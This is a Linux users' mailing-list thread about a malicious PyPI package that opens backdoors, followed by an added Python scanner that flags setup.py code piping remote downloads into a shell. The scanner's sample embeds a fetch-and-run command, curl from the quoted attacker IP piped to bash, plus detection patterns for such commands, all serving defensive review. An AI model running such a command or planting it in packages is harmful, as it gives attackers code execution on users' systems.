Rich Mingin (PLUG) via plug on 23 May 2022 12:17:05 -0700



Re: [PLUG] botnet, backdoor


That only disables the propagation. Any hosts already snagged are probably converted to a different C3 host and still active. Taking down the original host prevents new growth, but it also makes it much harder to research and counter. With a live indoctrination host, you can add your honeypots to the botted swarm and get live info. Without fresh indocs, you have to try to track down an already compromised host, compromise it again, and ride along that way.

On Mon, May 23, 2022 at 11:11 AM Mark Bergman via plug <plug@lists.phillylinux.org> wrote:
In the message dated: Mon, 23 May 2022 10:42:55 -0400,
The pithy ruminations from jeffv via plug on
[[PLUG] botnet, backdoor] were:
=>
=> Malicious PyPI package opens backdoors on Windows, Linux, and Macs
=>
=> https://www.bleepingcomputer.com/news/security/malicious-pypi-package-opens-backdoors-on-windows-linux-and-macs/
=>
=>
=> For Linux systems, the Python script connects to a remote URL at
=> 39.107.154.72 and pipes the output to the bash shell. Unfortunately,

There seems to have been an editing mistake... The "reporter" from bleepingcomputer probably meant to write:

        Fortunately, that host is down, disabling the C&C aspects of the botnet and rendering it harmless.

=> that host is down at the time of this writing, so it is unclear what
=> commands are executed, but it is believed to open a reverse shell.
=>

--
Mark Bergman    Biker, Rock Climber, SCUBA Diver, Unix mechanic, IATSE #1 Stagehand
'94 Yamaha GTS1000A^1                                         2015 Aprilia Caponord
                        https://www.flickr.com/photos/rmsppu

___________________________________________________________________________
Philadelphia Linux Users Group         --        http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug
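The quoted article describes the Linux payload as a fetch from a remote address piped straight into bash at install time. The following is an added example (not code from the thread, the article, or the malicious package) of a static check a package reviewer could run over a setup.py before installing it: it walks the Python AST, finds calls to the usual shell sinks, and flags string arguments that pipe curl/wget output into a shell or that name a remote host. The sample setup.py it scans is constructed for the example; the only real detail taken from the page is the 39.107.154.72 address quoted above.

```python
"""Flag install-time shell execution that pipes a remote download into a shell.

Static check over the source of a package's setup.py (or any module that runs
at pip install time). The file is parsed, never executed.
"""
import ast
import re

# Call targets that hand a string to a shell or spawn a process.
SHELL_SINKS = {
    ("os", "system"), ("os", "popen"),
    ("subprocess", "run"), ("subprocess", "call"), ("subprocess", "check_call"),
    ("subprocess", "check_output"), ("subprocess", "Popen"),
}

# "curl ... | bash", "wget -O- ... | sh", optionally via sudo.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
# A URL or a dotted-quad literal inside the command.
REMOTE_URL = re.compile(r"(https?|ftp)://\S+|\b\d{1,3}(\.\d{1,3}){3}\b")

# Constructed sample (assumption: not the real package's setup.py). The first
# command mirrors the fetch-and-pipe-to-bash behaviour the article describes.
SAMPLE_SETUP_PY = '''
import os, platform, subprocess
from setuptools import setup

if platform.system() == "Linux":
    # constructed: remote fetch piped into bash, as in the article
    os.system("curl -s http://39.107.154.72/ | bash")

subprocess.run(["pip", "install", "requests"])  # benign: nothing fetched and piped

setup(name="demo", version="0.0.1")
'''


def _dotted_name(node):
    """Return ('os', 'system') for the call target os.system, else None."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return (node.value.id, node.attr)
    return None


def _string_args(call):
    """Collect every string literal passed to the call, including list elements."""
    out = []
    for arg in list(call.args) + [kw.value for kw in call.keywords]:
        nodes = arg.elts if isinstance(arg, (ast.List, ast.Tuple)) else [arg]
        for n in nodes:
            if isinstance(n, ast.Constant) and isinstance(n.value, str):
                out.append(n.value)
    return out


def scan_source(source, filename="setup.py"):
    """Return a list of (line, reason, command) findings for the given source."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        if _dotted_name(node.func) not in SHELL_SINKS:
            continue
        cmd = " ".join(_string_args(node))
        if PIPE_TO_SHELL.search(cmd):
            findings.append((node.lineno, "remote download piped into a shell", cmd))
        elif REMOTE_URL.search(cmd):
            findings.append((node.lineno, "shell command referencing a remote host", cmd))
    return findings


if __name__ == "__main__":
    for line, reason, cmd in scan_source(SAMPLE_SETUP_PY):
        print(f"setup.py:{line}: {reason}: {cmd!r}")
```

The check only sees string literals, so a payload assembled from concatenation, base64, or a downloaded second stage will slip past it; treat a clean result as "nothing obvious", not as a verdict, and prefer installing with `--only-binary` or inspecting the sdist by hand when the package is unfamiliar.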